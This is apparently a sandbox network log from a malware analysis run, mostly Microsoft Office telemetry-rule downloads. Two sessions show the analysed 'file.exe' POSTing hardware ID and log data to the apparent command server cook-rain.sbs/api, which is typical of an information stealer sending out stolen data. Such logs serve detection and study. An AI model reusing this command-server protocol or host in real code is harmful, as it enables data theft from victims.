                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:24 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                      x-ms-request-id: 3af01634-701e-000d-3dd2-3b6de3000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052324Z-r1d97b99577sdxndhC1TEBec5n00000009y000000000paq7
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:24 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      17192.168.2.649726188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=0M3B8IGEVHQVF16DUY
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 19969
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:23 UTC15331OUTData Raw: 2d 2d 30 4d 33 42 38 49 47 45 56 48 51 56 46 31 36 44 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 30 4d 33 42 38 49 47 45 56 48 51 56 46 31 36 44 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4d 33 42 38 49 47 45 56 48 51 56 46 31 36 44 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                      Data Ascii: --0M3B8IGEVHQVF16DUYContent-Disposition: form-data; name="hwid"B065CA7CBA966C7B63CFCF7E6C45F838--0M3B8IGEVHQVF16DUYContent-Disposition: form-data; name="pid"3--0M3B8IGEVHQVF16DUYContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                      2024-11-21 05:23:23 UTC4638OUTData Raw: 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f
                                                                                                                                                                      Data Ascii: 2+?2+?2+?o?Mp5
                                                                                                                                                                      2024-11-21 05:23:24 UTC986INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:24 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=dk3686imksth8g3jlrtsj8fi6s; expires=Sun, 16-Mar-2025 23:10:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2wcgj2Jqzyuuma%2Fnq5%2FyU0jkT5uKFNrm7sPiK3K%2FaaaJubKDQqAP4k9UkBNwhV2gp455Jb2f7L2c6zIctUsxZg3zkfsj%2FC7pYPOSuBBl3MloFnXBO2DhNYGeXujDJll"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f5b0bcac351-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1501&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20928&delivery_rate=1938911&cwnd=184&unsent_bytes=0&cid=72a35773651761bf&ts=933&x=0"
                                                                                                                                                                      2024-11-21 05:23:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                      2024-11-21 05:23:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      18192.168.2.64972713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:25 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:26 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                      x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052326Z-178bfbc474bw8bwphC1NYC38b400000000s000000000t00m
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      19192.168.2.64972813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:25 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:26 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                      x-ms-request-id: 4e7b5ce8-701e-0098-117a-3b395f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052326Z-178bfbc474bkvpdnhC1NYCuu2w00000001600000000018nn
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      20192.168.2.64972913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:25 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:26 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                      x-ms-request-id: 3e1ce11e-901e-00ac-5292-3bb69e000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052326Z-r1d97b9957744xz5hC1TEB5bf800000009rg00000000eq0f
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      21192.168.2.64973113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:25 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:26 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                      x-ms-request-id: f9adfbee-d01e-0028-5ea6-3b7896000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052326Z-r1d97b99577tssmjhC1TEB8kan00000009tg000000009tbv
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      22192.168.2.64973013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:26 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:26 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                      x-ms-request-id: 35b36372-301e-005d-408e-3be448000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052326Z-1777c6cb754mrj2shC1TEB6k7w0000000aq000000000n1e1
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      23192.168.2.649732188.114.97.34431600C:\Users\user\Desktop\file.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:26 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=SH3XT0BYL4ZZCZN
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 1226
                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                      2024-11-21 05:23:26 UTC1226OUTData Raw: 2d 2d 53 48 33 58 54 30 42 59 4c 34 5a 5a 43 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 36 35 43 41 37 43 42 41 39 36 36 43 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 53 48 33 58 54 30 42 59 4c 34 5a 5a 43 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 48 33 58 54 30 42 59 4c 34 5a 5a 43 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                      Data Ascii: --SH3XT0BYL4ZZCZNContent-Disposition: form-data; name="hwid"B065CA7CBA966C7B63CFCF7E6C45F838--SH3XT0BYL4ZZCZNContent-Disposition: form-data; name="pid"1--SH3XT0BYL4ZZCZNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                      2024-11-21 05:23:27 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:27 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=qq1j74ngap8266khjondj3u8pa; expires=Sun, 16-Mar-2025 23:10:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBqbyoavx4s%2FkcZ9jDzv%2BDSe6aJoJvXsic%2BlzQtRxLSQWqLTFUzifBqykRV4McQCquObwHQV0HXdsvSgYj0Z70FXID38U3nE1PD%2FRKCLyHzp1HoyyEDkryz7N2PfnqrE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e5e3f6e59d27286-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2013&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2137&delivery_rate=1392465&cwnd=240&unsent_bytes=0&cid=ca574330117987fd&ts=731&x=0"
                                                                                                                                                                      2024-11-21 05:23:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                      2024-11-21 05:23:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      24192.168.2.64973313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:28 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                      x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052328Z-1777c6cb754wcxkwhC1TEB3c6w0000000ahg00000000cf1p
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
